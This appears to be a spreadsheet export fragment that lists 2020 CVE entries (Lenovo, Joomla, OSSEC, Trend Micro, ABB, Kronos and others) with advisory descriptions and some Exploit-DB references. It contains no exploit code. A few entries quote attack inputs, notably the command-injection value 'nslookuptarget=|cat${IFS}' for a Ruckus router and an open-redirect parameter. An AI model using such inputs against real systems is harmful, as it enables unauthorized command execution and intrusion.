  <si>
    <t>The BIOS tamper detection mechanism was not triggered in Lenovo ThinkPad A285, BIOS versions up to r0xuj70w; A485, BIOS versions up to r0wuj65w; T495 BIOS versions up to r12uj55w; T495s/X395, BIOS versions up to r13uj47w, while the emergency-reset button is pressed which may allow for unauthorized access.</t>
  </si>
  <si>
    <t>CVE-2020-8336</t>
  </si>
  <si>
    <t>Lenovo implemented Intel CSME Anti-rollback ARB protections on some ThinkPad models to prevent roll back of CSME Firmware in flash.</t>
  </si>
  <si>
    <t>CVE-2020-8337</t>
  </si>
  <si>
    <t>An unquoted search path vulnerability was reported in versions prior to 1.0.83.0 of the Synaptics Smart Audio UWP app associated with the DCHU audio drivers on Lenovo platforms that could allow an administrative user to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-8338</t>
  </si>
  <si>
    <t>A DLL search path vulnerability was reported in Lenovo Diagnostics prior to version 4.35.4 that could allow a user with local access to execute code on the system.</t>
  </si>
  <si>
    <t>CVE-2020-8339</t>
  </si>
  <si>
    <t>A cross-site scripting inclusion (XSSI) vulnerability was reported in the legacy IBM BladeCenter Advanced Management Module (AMM) web interface prior to version 3.68n [BPET68N]. This vulnerability could allow an authenticated user's AMM credentials to be disclosed if the user is convinced to visit a malicious web site, possibly through phishing. Successful exploitation requires specific knowledge about the user’s network to be included in the malicious web site. Impact is limited to the normal access restrictions of the user visiting the malicious web site, and subject to the user being logged into AMM, being able to connect to both AMM and the malicious web site while the web browser is open, and using a web browser that does not inherently protect against this class of attack. The JavaScript code is not executed on AMM itself.</t>
  </si>
  <si>
    <t>CVE-2020-8340</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability was discovered in the legacy IBM and Lenovo System x IMM2 (Integrated Management Module 2), prior to version 5.60, embedded Baseboard Management Controller (BMC) web interface during an internal security review. This vulnerability could allow JavaScript code to be executed in the user's web browser if the user is convinced to visit a crafted URL, possibly through phishing. Successful exploitation requires specific knowledge about the user’s network to be included in the crafted URL. Impact is limited to the normal access restrictions and permissions of the user clicking the crafted URL, and subject to the user being able to connect to and already being authenticated to IMM2 or other systems. The JavaScript code is not executed on IMM2 itself.</t>
  </si>
  <si>
    <t>CVE-2020-8341</t>
  </si>
  <si>
    <t>In Lenovo systems, SMM BIOS Write Protection is used to prevent writes to SPI Flash. While this provides sufficient protection, an additional layer of protection is provided by SPI Protected Range Registers (PRx). After resuming from S3 sleep mode in various versions of BIOS for some Lenovo ThinkPad systems, the PRx is not set. This does not impact the SMM BIOS Write Protection, which keeps systems protected.</t>
  </si>
  <si>
    <t>CVE-2020-8342</t>
  </si>
  <si>
    <t>A race condition vulnerability was reported in Lenovo System Update prior to version 5.07.0106 that could allow escalation of privilege.</t>
  </si>
  <si>
    <t>CVE-2020-8345</t>
  </si>
  <si>
    <t>A DLL search path vulnerability was reported in the Lenovo HardwareScan Plugin for the Lenovo Vantage hardware scan feature prior to version 1.0.46.11 that could allow escalation of privilege.</t>
  </si>
  <si>
    <t>CVE-2020-8346</t>
  </si>
  <si>
    <t>A denial of service vulnerability was reported in the Lenovo Vantage component called Lenovo System Interface Foundation prior to version 1.1.19.5 that could allow configuration files to be written to non-standard locations.</t>
  </si>
  <si>
    <t>CVE-2020-8347</t>
  </si>
  <si>
    <t>A reflective cross-site scripting (XSS) vulnerability was reported in Lenovo Enterprise Network Disk prior to version 6.1 patch 6 hotfix 4 that could allow execution of code in an authenticated user's browser if a crafted url is visited, possibly through phishing.</t>
  </si>
  <si>
    <t>CVE-2020-8348</t>
  </si>
  <si>
    <t>A DOM-based cross-site scripting (XSS) vulnerability was reported in Lenovo Enterprise Network Disk prior to version 6.1 patch 6 hotfix 4 that could allow execution of code in an authenticated user's current browser session if a crafted url is visited, possibly through phishing.</t>
  </si>
  <si>
    <t>CVE-2020-8349</t>
  </si>
  <si>
    <t>An internal security review has identified an unauthenticated remote code execution vulnerability in Cloud Networking Operating System (CNOS)’ optional REST API management interface. This interface is disabled by default and not vulnerable unless enabled. When enabled, it is only vulnerable where attached to a VRF and as allowed by defined ACLs. Lenovo strongly recommends upgrading to a non-vulnerable CNOS release. Where not possible, Lenovo recommends disabling the REST API management interface or restricting access to the management VRF and further limiting access to authorized management stations via ACL.</t>
  </si>
  <si>
    <t>CVE-2020-8350</t>
  </si>
  <si>
    <t>An authentication bypass vulnerability was reported in Lenovo ThinkPad Stack Wireless Router firmware version 1.1.3.4 that could allow escalation of privilege.</t>
  </si>
  <si>
    <t>CVE-2020-8351</t>
  </si>
  <si>
    <t>A privilege escalation vulnerability was reported in Lenovo PCManager prior to version 3.0.50.9162 that could allow an authenticated user to execute code with elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-8352</t>
  </si>
  <si>
    <t>In some Lenovo Desktop models, the Configuration Change Detection BIOS setting failed to detect SATA configuration changes.</t>
  </si>
  <si>
    <t>CVE-2020-8353</t>
  </si>
  <si>
    <t>Prior to August 10, 2020, some Lenovo Desktop and Workstation systems were shipped with the Embedded Host Based Configuration (EHBC) feature of Intel AMT enabled. This could allow an administrative user with local access to configure Intel AMT.</t>
  </si>
  <si>
    <t>CVE-2020-8354</t>
  </si>
  <si>
    <t>A potential vulnerability in the SMI callback function used in the VariableServiceSmm driver in some Lenovo Notebook models may allow arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-8355</t>
  </si>
  <si>
    <t>An internal product security audit of Lenovo XClarity Administrator (LXCA) prior to version 3.1.0 discovered the Windows OS credentials provided by the LXCA user to perform driver updates of managed systems may be captured in the First Failure Data Capture (FFDC) service log if the service log is generated while managed endpoints are updating. The service log is only generated when requested by a privileged LXCA user and it is only accessible to the privileged LXCA user that requested the file and is then deleted.</t>
  </si>
  <si>
    <t>CVE-2020-8356</t>
  </si>
  <si>
    <t>An internal product security audit of LXCO, prior to version 1.2.2, discovered that optional passwords, if specified, for the Syslog and SMTP forwarders are written to an internal LXCO log file in clear text. Affected logs are captured in the First Failure Data Capture (FFDC) service log. The FFDC service log is only generated when requested by a privileged LXCO user and it is only accessible to the privileged LXCO user that requested the file.</t>
  </si>
  <si>
    <t>CVE-2020-8357</t>
  </si>
  <si>
    <t>A denial of service vulnerability was reported in Lenovo PCManager, prior to version 3.0.200.2042, that could allow configuration files to be written to non-standard locations.</t>
  </si>
  <si>
    <t>CVE-2020-8416</t>
  </si>
  <si>
    <t>IKTeam BearFTP before 0.2.0 allows remote attackers to achieve denial of service via a large volume of connections to the PASV mode port.</t>
  </si>
  <si>
    <t>exploits/linux/dos/47987.cs</t>
  </si>
  <si>
    <t>BearFTP 0.1.0 - 'PASV' Denial of Service</t>
  </si>
  <si>
    <t>CVE-2020-8417</t>
  </si>
  <si>
    <t>The Code Snippets plugin before 2.14.0 for WordPress allows CSRF because of the lack of a Referer check on the import menu.</t>
  </si>
  <si>
    <t>CVE-2020-8419</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! before 3.9.15. Missing token checks in the batch actions of various components cause CSRF vulnerabilities.</t>
  </si>
  <si>
    <t>CVE-2020-8420</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! before 3.9.15. A missing CSRF token check in the LESS compiler of com_templates causes a CSRF vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-8421</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! before 3.9.15. Inadequate escaping of usernames allows XSS attacks in com_actionlogs.</t>
  </si>
  <si>
    <t>CVE-2020-8422</t>
  </si>
  <si>
    <t>An authorization issue was discovered in the Credential Manager feature in Zoho ManageEngine Remote Access Plus before 10.0.450. A user with the Guest role can extract the collection of all defined credentials of remote machines: the credential name, credential type, user name, domain/workgroup name, and description (but not the password).</t>
  </si>
  <si>
    <t>CVE-2020-8423</t>
  </si>
  <si>
    <t>A buffer overflow in the httpd daemon on TP-Link TL-WR841N V10 (firmware version 3.16.9) devices allows an authenticated remote attacker to execute arbitrary code via a GET request to the page for the configuration of the Wi-Fi network.</t>
  </si>
  <si>
    <t>CVE-2020-8424</t>
  </si>
  <si>
    <t>Cups Easy (Purchase &amp; Inventory) 1.0 is vulnerable to CSRF that leads to admin account takeover via passwordmychange.php.</t>
  </si>
  <si>
    <t>CVE-2020-8425</t>
  </si>
  <si>
    <t>Cups Easy (Purchase &amp; Inventory) 1.0 is vulnerable to CSRF that leads to admin account deletion via userdelete.php.</t>
  </si>
  <si>
    <t>exploits/php/webapps/47973.txt</t>
  </si>
  <si>
    <t>Cups Easy 1.0 - Cross Site Request Forgery (Password Reset)</t>
  </si>
  <si>
    <t>CVE-2020-8426</t>
  </si>
  <si>
    <t>The Elementor plugin before 2.8.5 for WordPress suffers from a reflected XSS vulnerability on the elementor-system-info page. These can be exploited by targeting an authenticated user.</t>
  </si>
  <si>
    <t>CVE-2020-8427</t>
  </si>
  <si>
    <t>In Unitrends Backup before 10.4.1, an HTTP request parameter was not properly sanitized, allowing for SQL injection that resulted in an authentication bypass.</t>
  </si>
  <si>
    <t>CVE-2020-8428</t>
  </si>
  <si>
    <t>fs/namei.c in the Linux kernel before 5.5 has a may_create_in_sticky use-after-free, which allows local users to cause a denial of service (OOPS) or possibly obtain sensitive information from kernel memory, aka CID-d0cb50185ae9. One attack vector may be an open system call for a UNIX domain socket, if the socket is being moved to a new parent directory and its old parent directory is being removed.</t>
  </si>
  <si>
    <t>CVE-2020-8429</t>
  </si>
  <si>
    <t>The Admin web application in Kinetica 7.0.9.2.20191118151947 does not properly sanitise the input for the function getLogs. This lack of sanitisation could be exploited to allow an authenticated attacker to run remote code on the underlying operating system. The logFile parameter in the getLogs function was used as a variable in a command to read log files; however, due to poor input sanitisation, it was possible to bypass a replacement and break out of the command.</t>
  </si>
  <si>
    <t>CVE-2020-8430</t>
  </si>
  <si>
    <t>Stormshield Network Security 310 3.7.10 devices have an auth/lang.html?rurl= Open Redirect vulnerability on the captive portal. For example, the attacker can use rurl=//example.com instead of rurl=https://example.com in the query string.</t>
  </si>
  <si>
    <t>CVE-2020-8432</t>
  </si>
  <si>
    <t>In Das U-Boot through 2020.01, a double free has been found in the cmd/gpt.c do_rename_gpt_parts() function. Double freeing may result in a write-what-where condition, allowing an attacker to execute arbitrary code. NOTE: this vulnerablity was introduced when attempting to fix a memory leak identified by static analysis.</t>
  </si>
  <si>
    <t>CVE-2020-8434</t>
  </si>
  <si>
    <t>Jenzabar JICS (aka Internet Campus Solution) before 9.0.1 Patch 3, 9.1 before 9.1.2 Patch 2, and 9.2 before 9.2.2 Patch 8 has session cookies that are a deterministic function of the username. There is a hard-coded password to supply a PBKDF feeding into AES to encrypt a username and base64 encode it to a client-side cookie for persistent session authentication. By knowing the key and algorithm, an attacker can select any username, encrypt it, base64 encode it, and save it in their browser with the correct JICSLoginCookie cookie format to impersonate any real user in the JICS database without the need for authenticating (or verifying with MFA if implemented).</t>
  </si>
  <si>
    <t>CVE-2020-8435</t>
  </si>
  <si>
    <t>An issue was discovered in the RegistrationMagic plugin 4.6.0.0 for WordPress. There is SQL injection via the rm_analytics_show_form rm_form_id parameter.</t>
  </si>
  <si>
    <t>CVE-2020-8436</t>
  </si>
  <si>
    <t>XSS was discovered in the RegistrationMagic plugin 4.6.0.0 for WordPress via the rm_form_id, rm_tr, or form_name parameter.</t>
  </si>
  <si>
    <t>CVE-2020-8437</t>
  </si>
  <si>
    <t>The bencoding parser in BitTorrent uTorrent through 3.5.5 (build 45505) misparses nested bencoded dictionaries, which allows a remote attacker to cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-8438</t>
  </si>
  <si>
    <t>Ruckus ZoneFlex R500 104.0.0.0.1347 devices allow an authenticated attacker to execute arbitrary OS commands via the hidden /forms/nslookupHandler form, as demonstrated by the nslookuptarget=|cat${IFS} substring.</t>
  </si>
  <si>
    <t>CVE-2020-8439</t>
  </si>
  <si>
    <t>Monstra CMS through 3.0.4 allows remote authenticated users to take over arbitrary user accounts via a modified login parameter to an edit URI, as demonstrated by login=victim to the users/21/edit URI.</t>
  </si>
  <si>
    <t>CVE-2020-8440</t>
  </si>
  <si>
    <t>controllers/page_apply.php in Simplejobscript.com SJS through 1.66 is prone to unauthenticated Remote Code Execution by uploading a PHP script as a resume.</t>
  </si>
  <si>
    <t>CVE-2020-8441</t>
  </si>
  <si>
    <t>JYaml through 1.3 allows remote code execution during deserialization of a malicious payload through the load() function. NOTE: this is a discontinued product.</t>
  </si>
  <si>
    <t>CVE-2020-8442</t>
  </si>
  <si>
    <t>In OSSEC-HIDS 2.7 through 3.5.0, the server component responsible for log analysis (ossec-analysisd) is vulnerable to a heap-based buffer overflow in the rootcheck decoder component via an authenticated client.</t>
  </si>
  <si>
    <t>CVE-2020-8443</t>
  </si>
  <si>
    <t>In OSSEC-HIDS 2.7 through 3.5.0, the server component responsible for log analysis (ossec-analysisd) is vulnerable to an off-by-one heap-based buffer overflow during the cleaning of crafted syslog msgs (received from authenticated remote agents and delivered to the analysisd processing queue by ossec-remoted).</t>
  </si>
  <si>
    <t>CVE-2020-8444</t>
  </si>
  <si>
    <t>In OSSEC-HIDS 2.7 through 3.5.0, the server component responsible for log analysis (ossec-analysisd) is vulnerable to a use-after-free during processing of ossec-alert formatted msgs (received from authenticated remote agents and delivered to the analysisd processing queue by ossec-remoted).</t>
  </si>
  <si>
    <t>CVE-2020-8445</t>
  </si>
  <si>
    <t>In OSSEC-HIDS 2.7 through 3.5.0, the OS_CleanMSG function in ossec-analysisd doesn't remove or encode terminal control characters or newlines from processed log messages. In many cases, those characters are later logged. Because newlines (\n) are permitted in messages processed by ossec-analysisd, it may be possible to inject nested events into the ossec log. Use of terminal control characters may allow obfuscating events or executing commands when viewed through vulnerable terminal emulators. This may be an unauthenticated remote attack for certain types and origins of logged data.</t>
  </si>
  <si>
    <t>CVE-2020-8446</t>
  </si>
  <si>
    <t>In OSSEC-HIDS 2.7 through 3.5.0, the server component responsible for log analysis (ossec-analysisd) is vulnerable to path traversal (with write access) via crafted syscheck messages written directly to the analysisd UNIX domain socket by a local user.</t>
  </si>
  <si>
    <t>CVE-2020-8447</t>
  </si>
  <si>
    <t>In OSSEC-HIDS 2.7 through 3.5.0, the server component responsible for log analysis (ossec-analysisd) is vulnerable to a use-after-free during processing of syscheck formatted msgs (received from authenticated remote agents and delivered to the analysisd processing queue by ossec-remoted).</t>
  </si>
  <si>
    <t>CVE-2020-8448</t>
  </si>
  <si>
    <t>In OSSEC-HIDS 2.7 through 3.5.0, the server component responsible for log analysis (ossec-analysisd) is vulnerable to a denial of service (NULL pointer dereference) via crafted messages written directly to the analysisd UNIX domain socket by a local user.</t>
  </si>
  <si>
    <t>CVE-2020-8449</t>
  </si>
  <si>
    <t>An issue was discovered in Squid before 4.10. Due to incorrect input validation, it can interpret crafted HTTP requests in unexpected ways to access server resources prohibited by earlier security filters.</t>
  </si>
  <si>
    <t>CVE-2020-8450</t>
  </si>
  <si>
    <t>An issue was discovered in Squid before 4.10. Due to incorrect buffer management, a remote client can cause a buffer overflow in a Squid instance acting as a reverse proxy.</t>
  </si>
  <si>
    <t>CVE-2020-8461</t>
  </si>
  <si>
    <t>A CSRF protection bypass vulnerability in Trend Micro InterScan Web Security Virtual Appliance 6.5 SP2 could allow an attacker to get a victim's browser to send a specifically encoded request without requiring a valid CSRF token.</t>
  </si>
  <si>
    <t>CVE-2020-8462</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in Trend Micro InterScan Web Security Virtual Appliance 6.5 SP2 could allow an attacker to tamper with the web interface of the product.</t>
  </si>
  <si>
    <t>CVE-2020-8463</t>
  </si>
  <si>
    <t>A vulnerability in Trend Micro InterScan Web Security Virtual Appliance 6.5 SP2 could allow an attacker to bypass a global authorization check for anonymous users by manipulating request paths.</t>
  </si>
  <si>
    <t>CVE-2020-8464</t>
  </si>
  <si>
    <t>A vulnerability in Trend Micro InterScan Web Security Virtual Appliance 6.5 SP2 could allow an attacker to send requests that appear to come from the localhost which could expose the product's admin interface to users who would not normally have access.</t>
  </si>
  <si>
    <t>CVE-2020-8465</t>
  </si>
  <si>
    <t>A vulnerability in Trend Micro InterScan Web Security Virtual Appliance 6.5 SP2 could allow an attacker to manipulate system updates using a combination of CSRF bypass (CVE-2020-8461) and authentication bypass (CVE-2020-8464) to execute code as user root.</t>
  </si>
  <si>
    <t>CVE-2020-8466</t>
  </si>
  <si>
    <t>A command injection vulnerability in Trend Micro InterScan Web Security Virtual Appliance 6.5 SP2, with the improved password hashing method enabled, could allow an unauthenticated attacker to execute certain commands by providing a manipulated password.</t>
  </si>
  <si>
    <t>CVE-2020-8467</t>
  </si>
  <si>
    <t>A migration tool component of Trend Micro Apex One (2019) and OfficeScan XG contains a vulnerability which could allow remote attackers to execute arbitrary code on affected installations (RCE). An attempted attack requires user authentication.</t>
  </si>
  <si>
    <t>CVE-2020-8468</t>
  </si>
  <si>
    <t>Trend Micro Apex One (2019), OfficeScan XG and Worry-Free Business Security (9.0, 9.5, 10.0) agents are affected by a content validation escape vulnerability which could allow an attacker to manipulate certain agent client components. An attempted attack requires user authentication.</t>
  </si>
  <si>
    <t>CVE-2020-8469</t>
  </si>
  <si>
    <t>Trend Micro Password Manager for Windows version 5.0 is affected by a DLL hijacking vulnerability would could potentially allow an attacker privleged escalation.</t>
  </si>
  <si>
    <t>CVE-2020-8470</t>
  </si>
  <si>
    <t>Trend Micro Apex One (2019), OfficeScan XG and Worry-Free Business Security (9.0, 9.5, 10.0) server contains a vulnerable service DLL file that could allow an attacker to delete any file on the server with SYSTEM level privileges. Authentication is not required to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-8471</t>
  </si>
  <si>
    <t>For the Central Licensing Server component used in ABB products ABB Ability™ System 800xA and related system extensions versions 5.1, 6.0 and 6.1, Compact HMI versions 5.1 and 6.0, Control Builder Safe 1.0, 1.1 and 2.0, Symphony Plus -S+ Operations 3.0 to 3.2 Symphony Plus -S+ Engineering 1.1 to 2.2, Composer Harmony 5.1, 6.0 and 6.1, Melody Composer 5.3, 6.1/6.2 and SPE for Melody 1.0SPx (Composer 6.3), Harmony OPC Server (HAOPC) Standalone 6.0, 6.1 and 7.0, ABB Ability™ System 800xA/ Advant® OCS Control Builder A 1.3 and 1.4, Advant® OCS AC100 OPC Server 5.1, 6.0 and 6.1, Composer CTK 6.1 and 6.2, AdvaBuild 3.7 SP1 and SP2, OPCServer for MOD 300 (non-800xA) 1.4, OPC Data Link 2.1 and 2.2, Knowledge Manager 8.0, 9.0 and 9.1, Manufacturing Operations Management 1812 and 1909, weak file permissions allow an authenticated attacker to block the license handling, escalate his/her privileges and execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-8472</t>
  </si>
  <si>
    <t>Insufficient folder permissions used by system functions in ABB System 800xA products OPCServer for AC800M (versions 6.0 and earlier) and Control Builder M Professional, MMSServer for AC800M, Base Software for SoftControl (version 6.1 and earlier) allow low privileged users to read, modify, add and delete system and application files. An authenticated attacker who successfully exploited the vulnerabilities could escalate his/her privileges, cause system functions to stop and to corrupt user applications.</t>
  </si>
  <si>
    <t>CVE-2020-8473</t>
  </si>
  <si>
    <t>Insufficient folder permissions used by system functions in ABB System 800xA Base (version 6.1 and earlier) allow low privileged users to read, modify, add and delete system and application files. An authenticated attacker who successfully exploit the vulnerabilities could escalate his/her privileges, cause system functions to stop and to corrupt user applications.</t>
  </si>
  <si>
    <t>CVE-2020-8474</t>
  </si>
  <si>
    <t>Weak Registry permissions in ABB System 800xA Base allow low privileged users to read and modify registry settings related to control system functionality, allowing an authenticated attacker to cause system functions to stop or malfunction.</t>
  </si>
  <si>
    <t>CVE-2020-8475</t>
  </si>
  <si>
    <t>For the Central Licensing Server component used in ABB products ABB Ability™ System 800xA and related system extensions versions 5.1, 6.0 and 6.1, Compact HMI versions 5.1 and 6.0, Control Builder Safe 1.0, 1.1 and 2.0, Symphony Plus -S+ Operations 3.0 to 3.2 Symphony Plus -S+ Engineering 1.1 to 2.2, Composer Harmony 5.1, 6.0 and 6.1, Melody Composer 5.3, 6.1/6.2 and SPE for Melody 1.0SPx (Composer 6.3), Harmony OPC Server (HAOPC) Standalone 6.0, 6.1 and 7.0, ABB Ability™ System 800xA/ Advant® OCS Control Builder A 1.3 and 1.4, Advant® OCS AC100 OPC Server 5.1, 6.0 and 6.1, Composer CTK 6.1 and 6.2, AdvaBuild 3.7 SP1 and SP2, OPCServer for MOD 300 (non-800xA) 1.4, OPC Data Link 2.1 and 2.2, Knowledge Manager 8.0, 9.0 and 9.1, Manufacturing Operations Management 1812 and 1909, ABB AbilityTM SCADAvantage versions 5.1 to 5.6.5, a weakness in validation of input exists that allows an attacker to block license handling by sending specially crafted messages to the CLS web service.</t>
  </si>
  <si>
    <t>CVE-2020-8476</t>
  </si>
  <si>
    <t>For the Central Licensing Server component used in ABB products ABB Ability™ System 800xA and related system extensions versions 5.1, 6.0 and 6.1, Compact HMI versions 5.1 and 6.0, Control Builder Safe 1.0, 1.1 and 2.0, Symphony Plus -S+ Operations 3.0 to 3.2 Symphony Plus -S+ Engineering 1.1 to 2.2, Composer Harmony 5.1, 6.0 and 6.1, Melody Composer 5.3, 6.1/6.2 and SPE for Melody 1.0SPx (Composer 6.3), Harmony OPC Server (HAOPC) Standalone 6.0, 6.1 and 7.0, ABB Ability™ System 800xA/ Advant® OCS Control Builder A 1.3 and 1.4, Advant® OCS AC100 OPC Server 5.1, 6.0 and 6.1, Composer CTK 6.1 and 6.2, AdvaBuild 3.7 SP1 and SP2, OPCServer for MOD 300 (non-800xA) 1.4, OPC Data Link 2.1 and 2.2, Knowledge Manager 8.0, 9.0 and 9.1, Manufacturing Operations Management 1812 and 1909, ABB AbilityTM SCADAvantage versions 5.1 to 5.6.5, a weakness in validation of input exists that allows an attacker to alter licenses assigned to the system nodes by sending specially crafted messages to the CLS web service.</t>
  </si>
  <si>
    <t>CVE-2020-8477</t>
  </si>
  <si>
    <t>The installations for ABB System 800xA Information Manager versions 5.1, 6.0 to 6.0.3.2 and 6.1 wrongly contain an auxiliary component. An attacker is able to use this for an XSS-like attack to an authenticated local user, which might lead to execution of arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-8478</t>
  </si>
  <si>
    <t>Insufficient protection of the inter-process communication functions in ABB System 800xA products OPC Server for AC 800M, MMS Server for AC 800M and Base Software for SoftControl (all published versions) enables an attacker authenticated on the local system to inject data, affecting the online view of runtime data shown in Control Builder.</t>
  </si>
  <si>
    <t>CVE-2020-8479</t>
  </si>
  <si>
    <t>For the Central Licensing Server component used in ABB products ABB Ability™ System 800xA and related system extensions versions 5.1, 6.0 and 6.1, Compact HMI versions 5.1 and 6.0, Control Builder Safe 1.0, 1.1 and 2.0, Symphony Plus -S+ Operations 3.0 to 3.2 Symphony Plus -S+ Engineering 1.1 to 2.2, Composer Harmony 5.1, 6.0 and 6.1, Melody Composer 5.3, 6.1/6.2 and SPE for Melody 1.0SPx (Composer 6.3), Harmony OPC Server (HAOPC) Standalone 6.0, 6.1 and 7.0, ABB Ability™ System 800xA/ Advant® OCS Control Builder A 1.3 and 1.4, Advant® OCS AC100 OPC Server 5.1, 6.0 and 6.1, Composer CTK 6.1 and 6.2, AdvaBuild 3.7 SP1 and SP2, OPCServer for MOD 300 (non-800xA) 1.4, OPC Data Link 2.1 and 2.2, Knowledge Manager 8.0, 9.0 and 9.1, Manufacturing Operations Management 1812 and 1909, ABB AbilityTM SCADAvantage versions 5.1 to 5.6.5. an XML External Entity Injection vulnerability exists that allows an attacker to read or call arbitrary files from the license server and/or from the network and also block the license handling.</t>
  </si>
  <si>
    <t>CVE-2020-8481</t>
  </si>
  <si>
    <t>For ABB products ABB Ability™ System 800xA and related system extensions versions 5.1, 6.0 and 6.1, Compact HMI versions 5.1 and 6.0, Control Builder Safe 1.0, 1.1 and 2.0, Symphony Plus -S+ Operations 3.0 to 3.2 Symphony Plus -S+ Engineering 1.1 to 2.2, Composer Harmony 5.1, 6.0 and 6.1, Melody Composer 5.3, 6.1/6.2 and SPE for Melody 1.0SPx (Composer 6.3), Harmony OPC Server (HAOPC) Standalone 6.0, 6.1 and 7.0, ABB Ability™ System 800xA/ Advant® OCS Control Builder A 1.3 and 1.4, Advant® OCS AC100 OPC Server 5.1, 6.0 and 6.1, Composer CTK 6.1 and 6.2, AdvaBuild 3.7 SP1 and SP2, OPCServer for MOD 300 (non-800xA) 1.4, OPC Data Link 2.1 and 2.2, Knowledge Manager 8.0, 9.0 and 9.1, Manufacturing Operations Management 1812 and 1909, confidential data is written in an unprotected file. An attacker who successfully exploited this vulnerability could take full control of the computer.</t>
  </si>
  <si>
    <t>CVE-2020-8482</t>
  </si>
  <si>
    <t>Insecure storage of sensitive information in ABB Device Library Wizard versions 6.0.X, 6.0.3.1 and 6.0.3.2 allows unauthenticated low privilege user to read file that contains confidential data</t>
  </si>
  <si>
    <t>CVE-2020-8484</t>
  </si>
  <si>
    <t>Insufficient protection of the inter-process communication functions in ABB System 800xA for DCI (all published versions) enables an attacker authenticated on the local system to inject data, allowing reads and writes to the controllers or cause windows processes to crash.</t>
  </si>
  <si>
    <t>CVE-2020-8485</t>
  </si>
  <si>
    <t>Insufficient protection of the inter-process communication functions in ABB System 800xA for MOD 300 (all published versions) enables an attacker authenticated on the local system to inject data, allowing reads and writes to the controllers or cause windows processes to crash.</t>
  </si>
  <si>
    <t>CVE-2020-8486</t>
  </si>
  <si>
    <t>Insufficient protection of the inter-process communication functions in ABB System 800xA RNRP (all published versions) enables an attacker authenticated on the local system to inject data, affect node redundancy handling.</t>
  </si>
  <si>
    <t>CVE-2020-8487</t>
  </si>
  <si>
    <t>Insufficient protection of the inter-process communication functions in ABB System 800xA Base (all published versions) enables an attacker authenticated on the local system to inject data, affect node redundancy handling.</t>
  </si>
  <si>
    <t>CVE-2020-8488</t>
  </si>
  <si>
    <t>Insufficient protection of the inter-process communication functions in ABB System 800xA Batch Management (all published versions) enables an attacker authenticated on the local system to inject data, affecting User Interface update during batch execution and/or compare/printing functionalities.</t>
  </si>
  <si>
    <t>CVE-2020-8489</t>
  </si>
  <si>
    <t>Insufficient protection of the inter-process communication functions in ABB System 800xA Information Management (all published versions) enables an attacker authenticated on the local system to inject data, affecting the runtime values to be stored in the archive, or making Information Management history services unavailable.</t>
  </si>
  <si>
    <t>CVE-2020-8492</t>
  </si>
  <si>
    <t>Python 2.7 through 2.7.17, 3.5 through 3.5.9, 3.6 through 3.6.10, 3.7 through 3.7.6, and 3.8 through 3.8.1 allows an HTTP server to conduct Regular Expression Denial of Service (ReDoS) attacks against a client because of urllib.request.AbstractBasicAuthHandler catastrophic backtracking.</t>
  </si>
  <si>
    <t>CVE-2020-8493</t>
  </si>
  <si>
    <t>A stored XSS vulnerability in Kronos Web Time and Attendance (webTA) affects 3.8.x and later 3.x versions before 4.0 via multiple input fields (Login Message, Banner Message, and Password Instructions) of the com.threeis.webta.H261configMenu servlet via an authenticated administrator.</t>
  </si>
  <si>
    <t>CVE-2020-8494</t>
  </si>
  <si>
    <t>In Kronos Web Time and Attendance (webTA) 3.8.x and later 3.x versions before 4.0, the com.threeis.webta.H402editUser servlet allows an attacker with Timekeeper, Master Timekeeper, or HR Admin privileges to gain unauthorized administrative privileges within the application via the emp_id, userid, pw1, pw2, supervisor, and timekeeper parameters.</t>
  </si>
  <si>
    <t>CVE-2020-8495</t>
  </si>
  <si>
    <t>In Kronos Web Time and Attendance (webTA) 3.8.x and later 3.x versions before 4.0, the com.threeis.webta.H491delegate servlet allows an attacker with Timekeeper or Supervisor privileges to gain unauthorized administrative privileges within the application via the delegate, delegateRole, and delegatorUserId parameters.</t>
  </si>
  <si>
    <t>exploits/java/webapps/48001.py</t>
  </si>
  <si>
    <t>Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation</t>
  </si>
  <si>
    <t>CVE-2020-8496</t>
  </si>
  <si>
    <t>In Kronos Web Time and Attendance (webTA) 4.1.x and later 4.x versions before 5.0, there is a Stored XSS vulnerability by setting the Application Banner input field of the /ApplicationBanner page as an authenticated administrator.</t>
  </si>
  <si>
    <t>CVE-2020-8497</t>
  </si>
  <si>
    <t>In Artica Pandora FMS through 7.42, an unauthenticated attacker can read the chat history. The file is in JSON format and it contains user names, user IDs, private messages, and timestamps.</t>
  </si>
  <si>
    <t>CVE-2020-8498</t>
  </si>
  <si>
    <t>XSS exists in the shortcode functionality of the GistPress plugin before 3.0.2 for WordPress via the includes/class-gistpress.php id parameter. This allows an attacker with the WordPress Contributor role to execute arbitrary JavaScript code with the privileges of other users (e.g., ones who have the publish_posts capability).</t>
  </si>
  <si>
    <t>CVE-2020-8500</t>
  </si>
  <si>
    <t>** DISPUTED ** In Artica Pandora FMS 7.42, Web Admin users can execute arbitrary code by uploading a .php file via the Updater or Extension component. NOTE: The vendor reports that this is intended functionality.</t>
  </si>
  <si>
    <t>CVE-2020-8503</t>
  </si>
  <si>
    <t>Biscom Secure File Transfer (SFT) 5.0.1050 through 5.1.1067 and 6.0.1000 through 6.0.1003 allows Insecure Direct Object Reference (IDOR) by an authenticated sender because of an error in a file-upload feature. This is fixed in 5.1.1068 and 6.0.1004.</t>
  </si>
  <si>
    <t>CVE-2020-8504</t>
  </si>
  <si>
    <t>School Management Software PHP/mySQL through 2019-03-14 allows office_admin/?action=addadmin CSRF to add an administrative user.</t>
  </si>
  <si>
    <t>exploits/php/webapps/47992.txt</t>
  </si>
  <si>
    <t>School ERP System 1.0 - Cross Site Request Forgery (Add Admin)</t>
  </si>
  <si>
    <t>CVE-2020-8505</t>
  </si>
  <si>
    <t>School Management Software PHP/mySQL through 2019-03-14 allows office_admin/?action=deleteadmin CSRF to delete a user.</t>
  </si>
  <si>
    <t>CVE-2020-8506</t>
  </si>
  <si>
